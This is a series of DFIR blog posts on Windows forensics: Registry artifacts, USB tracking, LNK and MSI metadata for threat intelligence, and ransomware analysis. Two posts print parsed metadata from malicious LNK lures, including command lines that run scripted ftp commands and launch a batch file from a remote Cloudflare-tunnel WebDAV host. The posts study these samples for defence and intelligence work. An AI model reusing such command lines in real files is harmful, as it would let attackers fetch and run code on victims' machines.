Thursday, December 11, 2025

Perspectives on Cybersecurity

I'm not a fan of many podcasts. I do like a conversational style, and there are some podcasts that I listen to, albeit not on a regular basis, and not for technical content. They're mostly about either "easter eggs" in Marvel or DC movies, or the conspiracies or speculation about an upcoming movie. Yeah, I know what you're thinking...why spoil it? The fact of the matter is that the way things are going with these superhero movies, it's going to be 2 or more years before the movie even comes out, and there's no way I'm going to remember the podcast.

When it comes to technical content, however, my podcast or video preferences are much more stringent. I'm not a big fan of gratuitous small talk and hilarity; for technical content, I take a more focused approach, and would tend to look for show notes, rather than sit through chatter, ads, and shoutz to sponsors.

Igor Tsyganskiy posted on LinkedIn about having listened to a recent Joe Rogan podcast, where Jensen Huang was the guest. I haven't listened to the podcast - Igor doesn't provide a link to make the interview easily accessible - but Igor did provide his view of a synopsis of the podcast content. Based on his comments, what I wanted to do here in this blog post is share my views, via my own aperture, with respect to Igor's comments.

Let me start by sharing my aperture. For those readers who are not familiar with my background, I spent the first 8 yrs following college working in a technical field in the military. I was trained to provide technical communications services to non- and less-technical folks, so it was something of a consulting role. I did more than just that, but that was what I was trained for, and represents most of my experience. Following my military time, I moved to the private sector, and began providing information security consulting services, starting with vulnerability assessments, and in some cases, "war dialing" (I'll leave that for you to Google). Around about 2000 or so, I moved into providing DFIR services, and spent the better part of the next quarter century in consulting, responding "on call" to cybersecurity incidents. During that time, I've worked closely with SOCs and MSSPs, I've been a SOC analyst, I've run a SOC, and I currently work for an MDR. 

All of this is to say that my perspective is not the same as Igor's, nor Jensen's; rather than perhaps seeing the final output from a high level, I've spent the better part of my civilian career at the boots-on-the-ground level, watching the sausage get made, or making the sausage myself. 

Now, on to Igor's comments:

AI presents unique challenges in the game of attack vs defense.

Does it? I'm not entirely sure, nor am I convinced, that it does. I do think that based on recent events, threat actors using AI to scale attacks, by pointing AI at the Internet and having it return a list of compromised systems or shells, is a challenge, but I do not see how it changes the defender's current status beyond volume, speed, and scale of the attacks.

Threat actors need to find a path from point A (their starting point) to point B (their target). These points are known to the threat actor (TA). Only the path is not known. 

Defenders need to identify A, deduct B and protect Every path from point A to target B. 

First task is computationally less costly then a second task.

On the surface, I agree with the "computationally less costly" statement with respect to the threat actors, and that just means that the disparity between threat actors and defenders is asymmetric. However, there's something here that neither Jensen nor Igor appears to add to the discussion; the "why". Why is there this asymmetry? 

The simplest answer is that while defenders should have the "home field advantage", they often don't. Most organizations are built on default installations of operating systems and applications, often with no accurate asset inventory (of systems and of applications), and without any attempts at attack surface reduction. It's not that threat actors have some magical intuition or mystical abilities, and are able to discern the network infrastructure from the outside...most times, if you look closely at the data, they do things because no one told them that they couldn't.

This brings something important to mind. About a decade ago, I ran an incident response for a manufacturing company with a global presence, including offices in Germany. As we started about deploying our tooling and scoping the incident, we saw that the threat actor had moved to endpoints in the office in Germany; however, we were not able to get our tooling installed, not because of technical issues, but due to Germany privacy laws. We could "see" that the threat actor was moving about these systems, establishing persistence, and stealing data, but there was nothing we could do because we could not deploy our toolset. This was clearly an artificiality that the threat actor ignored, because...well...who was going to stop them? Those working on those systems in that office were more concerned that anything found during the course of the incident response was going to be used against them, than they were of data theft, or possibly even ransomware. 

Sometimes during an incident response (IR) engagement, we'd find systems that no one recognized or knew about. Sometimes, we'd have a difficult time finding the actual "owner", of either the system or the application it was running. We'd find indications of Terminal Services running on workstations, or clear evidence that critical servers/domain controllers were regularly used by admins to browse the web, answer email (corporate and personal), etc. Threat actors simply take advantage of this lack of compartmentalization by trying to connect to another system, and finding their efforts succeed. 

Jensen makes a good point that defenders historically work together and therefore can most effectively defend. I agree.  

I do not. 

Based on my aperture, I have not seen "defenders historically work together"...not where the rubber meets the road, "at the coalface", as it were. Yes, perhaps from a much higher view...say that of a founder or CEO...looking across the vast landscape, we see gov't (CISA) and civilian agencies "working together" to make information available. 

However, when it comes to "boots on the ground", where I and others are looking over the shoulder of a system admin (or they're standing over mine), the perspective is entirely different.

I've been on IR engagements where local staff we happy to see me, and enthusiastic to work with me, and even sought out knowledge transfer. But I've also been on engagements that were the complete opposite, where local admins were not just suspicious of the IR team, but in some cases, actively worked against us.

During one IR, my point of contact asked me to take an advisor role, to direct his staff and engage them, having them do the work, while sharing the "why". At one point, I asked an admin to copy the Event Logs off of a Windows XP system, specifically asking him to NOT export the logs to text format, but to instead use the "copy" command. The admin nodded that he understood, so I handed him a thumb drive, and went about addressing other issues of the response. Later, when I got back to my room, I tried to run my tools against the files that had been copied to the thumb drive, but none of them worked. I opened the thumb drive, saw the three ".evt" files, and saw that they were not zero bytes in size. I then opened one of the .evt files in a hex editor, and could immediately see that the logs had indeed been exported to text, and then renamed to ".evt". I was able to do some work with the files that I had, but I was disappointed that I could not bring my toolset to bear against the files.

While this is just one example, but for every IR engagement where I'd show up and be greeted warmly, there was one or two where the local IT staff was ambivalent, at best, or quietly hostile about my presence. But sometimes, it's not about a consultant being there; something I've seen multiple times over the years is that regardless of what's said or how it's said, be it a SOC ticket, or a phone call (or both), there are times...a lot of times...when an organization will shrug off the "security incident" as, "oh, yeah, that's this admin or that contractor doing their work", when it clearly isn't. 

My point is that I'm not entirely sure that from my aperture, the statement "defenders historically work together" is historically accurate.

2. Defenders need magnitude more GPU cycles to defend 

Once again...why is that?

This goes back to the environment they're defending, which many times lacks an accurate "map", and most often has not been subject to an overall vision or policy, and hence, there's no attack surface reduction. Windows 10 and 11 endpoints are running Terminal Services, and applications are installed with no one realizing that a default installation of MSSQL was also installed along with the application, with default, hard-coded credentials (no brute force password guessing required). 

The detection and response eco-system is more expansive and dynamic than most folks seem to realize. While there is "the way things should be" at each point along the eco-system path, reality often belies this assumption.

Defenders require more GPU cycles because when alert is received, they need to understand the context of that alert, which many times is simply not available. Or, the analyst who receives the alert misinterprets it, and takes the wrong action (i.e., deems it a false positive, etc.), and the effects snowball. There are more than a few points along the eco-system path where the detection or response can go off the rails, leaving the impacted organization in a much worse position than they were before the alert was generated.

Wednesday, December 10, 2025

Releasing Open Source Tools to the Community

Every now and then, I get contacted by someone who tells me that they used the open source tools I've released in either a college course they took, or in a course provided by one of the many training vendors in the industry. I even once responded to an incident for a large energy sector organization, and while I was orienting myself to the incident, I looked over one of their analyst's shoulders and recognized the output of the tool they were using...it was one of mine.

What I've seen pretty consistently throughout my time in the industry is that once tools are known, people begin downloading them, and including them in their distros/toolsets, and some even add them to training courses (colleges, LE, the federal gov't, private sector, etc.). However, they do so without ever truly understanding the nature of the tool, how and why it was designed, or what problem it was intended to solve. Further, they rarely (to my knowledge) contact  the author to understand what went into the development of the tool, nor understand how the tool was intended to be used. For training courses in particular, those providing the materials and instruction do so without fully understanding how the tool author conducts their own investigations, and therefore, how the open source too fits into their overall investigative process. As a result, the instruction around that tool that's provided is often a shadow of what how the tool was intended to be used; what you're getting in these training courses is the instructor's perception of how the tool can be used. 

I've blogged a couple of times regarding various distros of tools that include RegRipper; for example, here and here. That second post includes a brief mention of the fact that, to a very limited extent, RegRipper v3.0 was included in Paraben's E3 product back in 2022; that is to say that the full capability of RegRipper wasn't implemented at the time, just a limited subset of plugins.

I recently heard from someone that Blue Cape Security includes RegRipper in their Practical Windows Forensics training course. If you look at the course content that's provided, the use of RegRipper starts in section 5.1 (Windows Registry Analysis), but Registry parsing (not actual analysis) itself continues into sections 5.2 (User Behavior Analysis), and 5.6 (Analyzing Evidence of Program Execution...I know, don't get me started...) and 5.7 (Finding Evidence of Persistence Mechanisms).

It seems that others use RegRipper, as well. PluralSight has an "OS Analysis with RegRipper" course, and Hackviser has a Windows Registry Forensic Analysis course, both including RegRipper.

I know what you're thinking...if I'm going to "complain" about this, why not do something about it? 

Well, I'm not complaining. That's not it, at all. All I'm saying is that if you take a training course that involves the use of open source tools that the vendor/instructor has collected, you're getting their perspective of the use of the tool, and likely not the full benefit of the "why" behind the tool. 

And yes, if I had even a hint that analysts and examiners were interested in really, truly understanding how to go about analyzing the Windows Registry, I'd develop and deliver a course, or series of courses, myself. As it is, my perspective is that folks are pretty happy with what they know.

Saturday, November 29, 2025

Intel in LNK Files

I was reading a pretty interesting write-up from Seqrite regarding, in part, the use of pseudo-polyglot documents. In this case, delivery occurred via ZIP archive that contains an LNK file and a PNG file. The PNG file is pseudo-polyglot file in question; the binary contents contain a series of commands to be executed via ftp.exe, followed by what appears to be a PDF document. The attack is initiated when the target user double clicks the LNK file; I'll leave the rest of the description to the author. I will say that I'm not used to the author's writing style, so it took me a bit of effort to get used to it, and to get a better view of what the author was trying to share. 

However, what did interest me more was that the threat actor's efforts included an LNK, something that had to be created on the threat actor's infrastructure before it was included in the archive. As such, from an intel perspective, LNK files are "free money", and something I've talked about here in this blog more than a few times.

Using the hash provided in the write-up, I was able to find a sample to download and parse myself. The LNK file itself had very little actual metadata beyond what was shared in the write-up, but that was still very interesting to me.

Take a look at the full set of metadata:

guid               {00021401-0000-0000-c000-000000000046}
shitemidlist       My Computer/C:\/Windows/system32/cmd.exe

**Shell Items Details (times in UTC)**
  C:0                   M:0                   A:0                  Windows  (9) 
  C:0                   M:0                   A:0                  system32  (9) 
  C:0                   M:0                   A:0                  cmd.exe  (9)  

commandline        /c ftp.exe -s:"offsec-certified-professional.png"
iconfilename       %ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe
hotkey             0x0                             
showcmd            0x1                             

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasArguments|HasIconLocation

***PropertyStoreDataBlock***
GUID/ID pairs:
{46588ae2-4cbc-4338-bbfc-139326986dce}/4      SID: S-1-5-21-1526495471-1806070692-3097244026-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

We can see that the shell item time stamps are zero'd out, there's no machineID or NetBIOS name listed, no volume serial number, etc. The dearth of metadata can be just as important, or even more so, than when an LNK file contains much more metadata. My most recent blog post on LNK file metadata, prior to this post, illustrates an LNK file that is rife with metadata. 

So, the LNK file used in the Seqrite campaign may be the result of using a specific tool to create the LNK file, or it may be the result of applying a process to the LNK file, after it was created, to "scrub" a lot of the metadata that we might expect to see. Either way, tracking this information can be very valuable for CTI teams, as the available metadata tells us something about the adversary. Also, strings such as the SID shown can be used to search for other, similar samples, in an effort to round out the adversary's intel picture.

Wednesday, November 26, 2025

Registry: FeatureUsage

Maurice posted on LinkedIn recently about one of the FeatureUsage Registry key subkeys; specifically, the AppSwitched subkey. Being somewhat, maybe even only slightly aware of the Windows Registry, I read the post with casual, even mild interest. 

Someone posted recently that cybersecurity runs on caffeine and sarcasm...I've got my cup of coffee right in front of me, and I've placed the sarcasm in front of us all.  ;-)

The RegRipper featureusage plugin was originally written in 2019, and includes a reference to a Crowdstrike blog post written in 2020, authored by Jai Minton (who is now with Huntress). The figure to the right was captured from the blog post, and provides a succinct description of how the AppSwitched key is populated. Specifically, Jai stated, "This key provides the number of times an application switched focus (was left-clicked on the taskbar)." This helps us understand a bit more about process execution, as for the application to exist on the taskbar and to have it's focus switched, that application has to have been executed.

After finding and reading the blog post, I wrote a brief blog post here on this blog that mentioned the Registry key, and referenced Jai's blog post.

To Maurice's point, this is, in fact, a valuable artifact, so kudos to Maurice for pointing it out and mentioning it again. If you read through the comments to Maurice's post, there are some hints there as to how to use the value data in your analysis. As you'll note, neither the value names nor the data itself  includes a timestamp, but the AppSwitched subkey does have a LastWrite time, and this can be included in a timeline. The value names can be used as pivot points into a timeline, adding something of a "third dimension" to timeline analysis. You can use this alongside timestamped information, such as Prefetch entries, Registry data, SRUM DB data, etc.

Unprecedented Complexity

I saw it again, just today. Another post on social media stating that IT teams/defenders "face unprecedented complexity". 

This one stood out amongst all of the posts proclaiming the need for agentic AI on the defender's side, due to how these agents were currently being employed on the attacker side. We hear things like "autonomous agents" being able to bring speed and scale to attacks. 

I will say that in my experience, defenders are always going to face complexity, but by it's very nature, I would be very reticent to call it "unprecedented". The reason for this is that cybersecurity is usually a bolted-on afterthought, one where the infrastructure already exists with a management culture that is completely against any sort of consolidated effort at overall "control". 

Most often, there's no single guiding policy or vision statement, specifically regarding cybersecurity. Many organizations and/or departments may not even fully understand their assets; what endpoints, both physical and virtual, are within their purview? How about applications running on those endpoints? And which of those assets are exposed to the public Internet, or even to access within the infrastructure itself, that don't need to be, or shouldn't be?

For example, some applications, such as backup or accounting solutions, will install MSSQL "under the hood". Is your IT team aware of this, and if so, have they taken steps to secure this installation? From experience, most don't...the answer to both questions is a resounding "IDK". 

Default installations of MSSQL will send login failure attempts to the Application Event Log, but not successful logins. That only really matters if you're monitoring your logs in some way; many aren't, and even with SIEM solutions, these events are sometimes not included in monitoring. I've seen endpoints with upwards of 45K (yes, you read that right...) failed login attempts to MSSQL recorded in the Application Event Log, but this is most often on systems where the application doesn't rely on the MSSQL installation having hard-coded account credentials. 

The point is that basic IT hygiene starts with an accurate asset inventory, and is followed with attack surface reduction. Once you know what systems you have, and what applications should/need to be running on those systems, you can begin to address such things as logging configurations, monitoring (SIEM, EDR, etc.), etc. Attack surface reduction adds to increasing the efficacy of your controls, and to minimizing noise from false positives. Not only does this ensure that you're alerted when a security incident does occur, but it also provides for context, *and* it furthers your ability to quickly determine the nature, scope, and origin of the incident. I've seen organizations who are using SIEM, but the Security Event Log on many of their Windows endpoints are not logging either successful logins, nor failed login attempts. 

This is going to be something of a hot take for many readers, but right now, AI (and specifically agentic AI) is a distraction for defenders. Yes, based on what we're seeing through social media, agentic AI may be furthering threat actors by facilitating faster attacks, at scale, but when it comes right down to it, it's all about the speed and volume; exposure of vulnerable systems remains the same. It's the finding and exploiting the vulnerable systems that's gotten faster.

The fact is that for the attacks to be successful, even with speed and scale, vulnerable systems need to be exposed to the Internet, and as such, accessed via some means. Yes, even endpoints not directly exposed to the Internet can be compromised via attacks such as phishing, SEO poisoning, or some other means that tricks the user into installing something that reaches out, but even some of these attacks can be inhibited or even obviated by some simple, free modifications to the endpoint itself. 

Thoughts on Analysis

Warning - before you get started reading this blog post, it's only fair that I warn you...in this post, I make the recommendation that you document your analysis process. If you find this traumatic, you might want to just move on. ;-)

Robert Jan Mora, a name that I've known for some time within the DFIR community, recently posted something pretty fascinating on LinkedIn, having to do with a case that he worked a bit ago. His post, in turn, leads to this The Wire article, from India, and includes an interview with him. 

The "so what" of the article itself has to do with an initial report that states that no malware was present, and two subsequent reports, one of which is from Robert Jan's analysis, stating that malware was found on a USB device.

In his LinkedIn post, Robert Jan emphasizes the need for malware scans in a law enforcement environment. Back when I first started working cases, even internally, in the early 2000s, I recommended the same thing, albeit with AV scanners not installed on imaged endpoint. Even more tools are available these days; for example, consider Yara, or something more along the lines of the Thor Scanner from Nextron Systems.

To learn a bit more about this man, check out this Forensic Focus interview

Okay, but so what? Why does this matter, or why is it important?

When looking to see if malware exists, or did exist on an endpoint, there are different approaches you can take, perhaps using AV scanners, or something like Yara. Or, sometimes, we may not find the actual malware itself, maybe not right away, but we will see clear indications of it's presence, or that it had executed. For example, if you've created a timeline of system activity, you may find a cluster of activity with different components derived from different sources, such as the Registry, Windows Event Log, file system, etc. Separately, these may not be entirely conclusive, but when viewed together, and within a narrow timeframe, they may provide clear indications of something having happened, much like finding footprints, disturbed earth, broken branches, and matted grass following the passage of an animal through a wilderness area.

You can even find indications of malware having been or even executed on a system, while the executable itself no longer exists on the endpoint at the time of the investigation. Using sources such as the SRUM DB and/or AmCache.hve and PCA log files may provide valuable insights, even if the malware has been removed from the endpoint.

When I was working PCI forensic investigations, our team had found that some of the malware used by the threat actors was based on a "compiled" Perl script, used to retrieve credit card numbers from a process memory dump. When run, the program extracted the Perl runtime from the EXE, and placed it in a particular folder path, and each time it was run, the path was slightly different; the final folder name changed. However, using file system metadata, we were able to determine a very explicit timeline of the compromise.

Or, we may find indications that an attempt was made to execute the malware, but it failed, either because it was detected and quarantined, or because something caused it to crash. PCA log files and application pop-up/WER messages in the Application Event Log have proved to be very illuminating on some of the cases with which I've engaged.

The key to all of this is to document your analysis process; if you don't know what you did, you can't make modifications or adjustments to the process. For example, if you have a memory dump, how did you go about searching for indications of a specific IP address? Volatility? Bulk_extractor? Don't remember/don't know? If you mounted the image and scanned it with AV, which one/version did you use? Knowing what you did, and what you found, means that you can then make adjustments and improvements to the process over time.

Thursday, November 13, 2025

Images

In writing Investigating Windows Systems, published in 2018, I made use of publicly available images found on the Internet. Some were images posted as examples of techniques, others were posted by professors running courses, and some were from CTFs. If you have read the book, you'll know that for each of the images, I either used or made a more "real world" scenario, something that aligned much more closely to my experiences over two and a half decades of DF/IR work, a good bit of which was consulting. During that time, and at several different companies, we'd have an "IR hotline" folks could call, and request computer incident response...this is something many firms continue to do. Those firms also very often had "intake forms", documents an analyst would fill out with pertinent information from a caller or customer, which very often included investigative goals. 

Over the years, the sites from which I downloaded some of the images I used have disappeared, which is unfortunate, but not a deal killer. The intent and value of the book isn't about the images, but rather, about the process. The processes used, even those where an image of a Windows XP system was used, can be replicated, developed, and extended for any Windows OS. 

Brett Shavers recently posted on LinkedIn, pointing the repository of available images he's compiled at DFIR.Training.

Over at Stark4N6, we see another repository of images, this one called The Evidence Locker. Here's Kevin's LinkedIn post with a description of the site.

If you're not interested in downloading full or partial images, I recently took a look at an infostealer sample, from the perspective of file formats. Fortunately, the OP provided a hash for the sample they looked at, which allowed me to find a site from which I could download a copy of the sample. I'm not a malware RE guy, but what I do try to do is follow Jesse Kornblum's example of using all the parts of the buffalo, and exploit file format metadata for threat intel purposes.

Wednesday, November 12, 2025

File Formats

I'm a huge fan of MS file formats, mostly because they provide for the possibility of an immense (and often untapped, unexploited) amount of metadata. Anyone who's followed me for any length of time, or has read my blog, knows that I'm a huge fan of file formats such as Registry hives (and non-Registry files with the same structure), as well as LNK files.

Historically, lots of different MS file formats have contained significant, and often damning, metadata. Anyone remember the issue of MSWord metadata that the Blair administration encountered over two decades ago? I shared some information related to coding, using the file as an exemplar, in the WindowsIR blog.

I ran across a LinkedIn post from Maurice Fielenbach, where he talked about an infostealer bundled in an MSI file. Interestingly enough, MSI files are structured storage files, following the OLE format, albeit with different streams, the same as MSWord docs and JumpList files

I'm not a malware RE guy, so I don't have a specialized tool set for parsing these kinds of files. I generally start with the MiTeC Structured Storage Viewer, something I've used before. In the image to the left, you can see the SummaryInformation block parsed and visible in MSSV. 

If you read through the comments, MalCat is recommended as a tool to use to run or click through the structure of this file format, and others. This looks like a great possibility, and to be honest, if you're into malware analysis, the MalCat blog looks really informative, as well. If you're interested in a sample to work with yourself, I found one at MalwareBazaar

In his LinkedIn post, Maurice said, "I highly recommend taking a deeper look at the MSI file format itself and familiarizing yourself with common installer frameworks such as WiX." I'd agree, particularly given that the test.msi image shows that the creating application was the "WiX Toolset".

Regardless of the tools you use, and the area of cybersecurity that you're in or focused on, information like this can expand your knowledge base as to what's possible, or by providing new directions for study or skill expansion. This is not only valuable as a malware or DF analyst, but also for threat intel analysts, as this information can add context and granularity to the intel you're developing.

Monday, November 10, 2025

What We Value

Over the passed couple of days, I've had images pop up in my feed showing people's workstations, most often with multiple screens. I've seen various configurations, some with three or more screens, but the other thing I've noted is that for those social media profiles, there's little else that's shared. 

Yep, they have a nifty configuration, one that they want to show off, but there's little to no attempts to show off their skills and abilities, what they've actually done with that configuration.

Within cybersecurity, we see a lot of that, as well with certifications, commercial product licenses, and even open-source distributions - you know, those DVDs or VMs where someone else pulls together a list of free and open-source tools, puts a fancy background and/or menu system on it. A lot of these distros often derive their "value" from how new they are, or how many tools are included...but rarely do we see, "...yeah, and this is how I used this distro to solve a case...", or anything close to that.

We often collect these things, like badges or challenge coins, but is someone really a better analyst if they have 4 instead of 3 screens? I honestly don't know...never having been able to afford multiple screens myself, I've spent the past 28 yrs operating off of single laptop screen. And yes, I have used some of those open-source tools, but I'm not a huge fan of distributions. 

All of this means that I tend to value something completely different from what the more vocal folks within the industry tend to value. I look to folks trying to develop and share processes and experiences that have the potential to change the direction of the industry.

Monday, November 03, 2025

Analysis Playbooks: USB

In 2005, Cory Altheide and I published the first peer-reviewed paper to address tracking USB devices on Windows systems. Over the years, it's been pretty amazing to see not only the artifacts expand and evolve, but to also see folks pick up the baton and carry on with describing what amounts to a "playbook" for developing this information as part of an investigation. Not only did malware such as Raspberry Robin propagate via USB devices, but with the rise of other devices that could be attached via a USB connection, but use different protocols, it became more important to operationalize this analysis in a playbook. 

After all, why not take the inefficient, error-prone, purely manual aspects out of the parsing by automating it?

Morad R. put together a series of posts that outline different data/artifact sources you can examine to identify USB devices that had been connected to the endpoint, as well as attribute the use of the devices to a particular user. This series of posts illustrates some steps that begin the process of pulling back the veil, if you will, to unraveling the use of USB devices on Windows systems. While there is definitely more to be done and shared, the important common factor across the posts is the use of timelines. 

USB Forensics, pt 1: Unmasking the connected device - Focuses on the System Registry hive, and extracting time stamps from Properties key values. The focus on a timeline is great way to get started on this, as doing so takes the analyst directly to context. 

However, by focusing on just USB and USBStor keys in the System hive, other devices (smartphones, digital cameras) are missed. However, that's not really an issue, per se, as the same playbook can be applied to the appropriate Registry keys.

USB Forensics, pt 2: Mapping device to user & drive letter - focuses on the user's NTUSER.DAT, but doesn't mention other artifacts, such as shellbags, RecentDocs, UserAssist, etc., that could be used to correlate additional user activity with the device, particularly via a timeline. 

RegRipper still makes use of "profiles", which is the term I used to describe what became known as "playbooks". Or, another way to look at it is that you can implement playbooks through these profiles.

USB Forensics, pt 3: The Event Log timeline - focus on a timeline continues, which is good. However, the logs are technically referred to as "Windows Event Logs"; "Event Logs" refer to the Windows 2000, XP, and 2003 era logs. I understand, I 'get it', that this is a distinction without a difference for most analysts, particularly those who've never had to work with Event Log records from older systems, and are only familiar with the new format implemented as of Windows Vista. 

All three of these posts, together, serve as a good foundation, and a great first step toward addressing USB-connected devices on Windows endpoints. Just as the field has grown and expanded since 2005, it will continue to do so in the future. In addition to providing the data sources, the underlying reliance on (or at least pointing in the direction of) timelines is, I believe, foundational. Start with a timeline, do not let a timeline be something you assemble manually, after everything else is done. We can always add or remove data sources, create new RegRipper or Events Ripper plugins, etc., but creating a timeline should be "first principles". 

In my current role, I don't have a need to determine things such as USB devices connected to a Windows system, but if I did, I'd definitely have Events Ripper plugins to extract that information, maybe even correlate it, into an easy-to-view manner. 

This is just some of the content from my blog that explicitly addresses USB devices:

Friday, October 31, 2025

Registry Analysis

First off, what is "analysis"?

I submit that "analysis" is what happens when an examiner has investigative goals and context, and applies this, along with their knowledge and experience, to a data set. This can be anything, from a physical image of a mobile device, to a triage collection from an endpoint, to logs from a device, or various devices. 

IMHO, this distinction is valuable, because what we often call "analysis" is really nothing more than parsing. For example, someone may recommend (or state as part of their process) that we open a Registry hive in a viewer, and navigate to a particular path by clicking through the UI. Now, there are ways that this could be accomplished in a much more efficient manner (I didn't say "easier", because the command line isn't "easier" for some), but in the end, looking for one value, dumping all of the values from a user's Run key is still just parsing; there's no "analysis" unless the investigator can articulate how this action and their finding applies to their goals. 

Registry Analysis
That being said, again...what we most often think of, or refer to as "Registry analysis" really amounts to nothing more than simple parsing. Few are actually conducting analysis of the files that comprise the Windows Registry, largely because the knowledge of and experience with these files is often somewhat limited. For example...and you don't need to raise your hands...but how many analysts are incorporating Registry hive file metadata into timelines? Or incorporating deleted keys and values in their overall analysis plan?

The Windows Registry includes a great deal of information related to the configuration of the endpoint, and for each user, contains information related to that user's activities. Not only does the Registry contain considerable metadata, but some of the values found within the Registry can contain valuable information regarding pre-existing states/conditions of the endpoint. For example, what we refer to as "shellbag" artifacts are comprised of shell items, strung together in shell item ID lists. Some of these shell items themselves contain considerable metadata, such as time stamps from folders, preserved at the time the "shellbag" artifacts were created. 

Something else to consider is that very often, information stored in the Registry will persist beyond the point where applications and files are deleted/removed from the endpoint. 

Over the years, the Windows Registry has gone through changes, but the analysis process remains the same, in part, because the binary format of the Registry remains consistent. What we traditionally refer to as "Registry analysis" now extends beyond "the usual" hive files that make up the Windows Registry, to the AmCache.hve file, as well as similarly formatted files associated with AppX packages. Ogmini's recent blog post regarding Registry hives associated with AppX packages references/points to Mari's ZeroFox blog on the topic, as well as Chris's Cyber Triage contribution, in addition to discussing sources beyond the "traditional" Registry. 

As these files are of the same format, there's no reason to believe that what we learned about the traditional hive files...metadata, what constitutes a "deleted" key or value, etc...needs to change when it comes to these files, as well. We can parse them for keys and values, such as looking for the recently accessed documents in the AppX version of Notepad or WordPad, just as we can parse these files into a timeline.

Parting Thoughts
Limitations or shortcomings in knowledge and experience of individual analysts can (and does) lead to the analysis and intel "poverty", and the shortcomings have a cascading impact. To overcome these, we need to work together, in mentor/mentee relationships, to build better, more applicable processes that allow us to fill these gaps. Operationalizing "corporate" knowledge for the long term is the key to this, as knowledge is shared without the requirement for commensurate experience. 

Monday, October 27, 2025

Analyzing Ransomware

Not long ago, I ran across this LinkedIn post on analyzing a ransomware executable, which led to this

HexaStrike post. The HexaStrike post covers analyzing an AI-generated ransomware variant, which (to be honest) is not something I'm normally interested in; however, in this case, the blog contained the following statement that caught my interest:

People often ask: “Why analyze ransomware? It’s destructive; by the time analysis happens, it’s too late”. That’s only half true. Analysis matters because sometimes samples exploit bugs to spread or escalate (think WannaCry/EternalBlue), they often ship persistence or exfiltration tricks that translate into detection rules, custom crypto occasionally ships with fixable flaws allowing recovering from ransomware, infrastructure and dev breadcrumbs surface through pathnames and URLs, and, being honest, it’s fun.

For anyone who's been following me for any length of time, here on this blog or on LinkedIn, you'll know that "dev breadcrumbs" are something that I'm very, VERY interested in. I tend to refer to them as "toolmarks" but "dev breadcrumbs" works just as well. 

Something else...in my experience, some of the malware RE write-ups are devoid of the types of things mentioned in the above quotes, particularly anything that "translates into detection rules". I know some are going think, "yeah, but like the quote also says, by the time we see this stuff executing, it's too late...", but that isn't always the case. For example, if you're able to write a detection rule that says, "...when we see an [un]signed process act as the parent for the following processes in quick succession, kill the parent process, log out the session owner, isolate the endpoint, and generate an alert...", then this sort of thing can be very valuable. 

Also, specific to ransomware, if there's a flaw in the encryption process found, then this may help with recovery where paying the ransom isn't required. For example, if the encryption process looks for a specific file or some other indicator, then that indicator can act as a "vaccine" of sorts; simply create it (say, an empty file) on the endpoint, and if the ransomware is launched against that endpoint, it will find the indicator (file), and based on the encryption logic, not encrypt files on the endpoint.

This is not a new idea, to be sure. Back in 2016, Kevin Strickland authored a blog post titled, "The Continuing Evolution of Samas Ransomware", showing how the ransomware executable changed over time, providing insight not just into the thought processes of the threat actors, and evolution of their tactics, but also detection opportunities.

Monday, September 01, 2025

Ransomware artifacts

I recently read through this FalconFeeds article on Qilin ransomware; being in DFIR consulting for as long as I have, and given how may ransomware incidents I've responded to or dug into, articles with titles like this attract my attention. I do not presume to know everything, and in fact, I'm very interested in the insights others provide based on their own investigations. As such, articles like this grab my attention. 

As I read through the article, however, I become somewhat confused. Consider this quote from article:

On closer examination, it is likely that the individual behind the Stack Overflow post was an infected victim rather than an attacker. This assessment is supported by the fact that another IP address 107[.]167[.]93[.]118 was observed with the same machine name (WIN-8OA3CCQAE4D) and identical configuration details. Such consistency across multiple, unrelated systems strongly indicates that the exploit automatically renames compromised hosts, leaving behind a uniform system identifier that inadvertently exposed itself in public forums. [emphasis added]

Okay, this statement is interesting. At work/day job, for example, we've observed this workstation name a number of times, with different IP addresses. Again, these have been observed at different times, so the thinking is that either a threat actor used different means to connect to the Internet, or the workstation with the NetBIOS name/machineID is a virtual machine shared by several individuals. I think what really threw me was the statement "...the exploit..."; while the word "exploit" is mentioned several times in the article, there's nothing that clearly delineates what that exploit is, nor how it was discovered or defined.

Later in the blog post, we see the section illustrated in Figure 1.

Figure 1: Blog excerpt

If I read the blog post correctly, the author's findings include the fact that the target victim is sent an LNK file by the threat actor; this is illustrated in Figure 2.

Figure 2: Blog excerpt

As anyone who's followed my work for any amount of time is aware, I'm very interested in LNK files, and not just from the perspective of parsing them, but more so, using the embedded metadata (or lack thereof, as the case may be) to develop threat intelligence. As JP/CERT pointed out a long time ago, there's a lot that an LNK file sent to a target can tell us about the developer's workstation, including the machine ID/NetBIOS name. So far, to my knowledge, the only folks to make full use of LNK metadata to develop threat intelligence is Mandiant, in their Nov 2018 write-up on APT29 (see fig. 5 & 6).

That being said, we know that many methods/APIs for creating LNK files automatically include the workstation name where the file is created in the LNK metadata. Since this affiliate is known (see Figure 2) to gain initial access to victim endpoints by sending a malicious LNK file, we know that the LNK file itself is not created on the target endpoint; as such, there is no reason to assume that there's an "exploit" that changes the name of impacted endpoint. 

While this is not something I've ever seen, nor heard of (again, I'll be the first to tell you that I don't know everything...), that doesn't mean that it's impossible. This definitely could happen, but the evidence presented doesn't hold up in the face of artifact knowledge and experience.

Using information from the FalconFeed article, I was able to locate and download a copy of the LNK file (MD5: 30fc1856c9e766a507015231a80879a8) and run it through my own LNK parser, and I got the following output:

guid               {00021401-0000-0000-c000-000000000046}
mtime              Fri Jan  3 15:02:21 2025 Z
atime              Fri Jan  3 15:02:21 2025 Z
ctime              Fri Jan  3 15:02:21 2025 Z
basepath           C:\Windows\System32\cmd.exe   
shitemidlist       My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
  C:2021-05-08 08:06:52  M:2025-02-05 09:50:22  A:2025-02-05 09:50:22 Windows  (9)  [530/1]
  C:2021-05-08 08:06:52  M:2025-01-28 21:48:18  A:2025-01-28 21:48:18 System32  (9)  [3286/1]
  C:2025-01-03 15:02:22  M:2025-01-03 15:02:22  A:2025-01-03 15:02:22 cmd.exe  (9)  
vol_sn             A409-2302                     
vol_type           Fixed Disk                    
commandline        /c "\\cayman-inter-descending-processed.trycloudflare.com@SSL\DavWWWRoot\kma.bat"
iconfilename       %SystemRoot%\System32\SHELL32.dll
hotkey             0x0                             
showcmd            0x7  
                           
***LinkFlags***
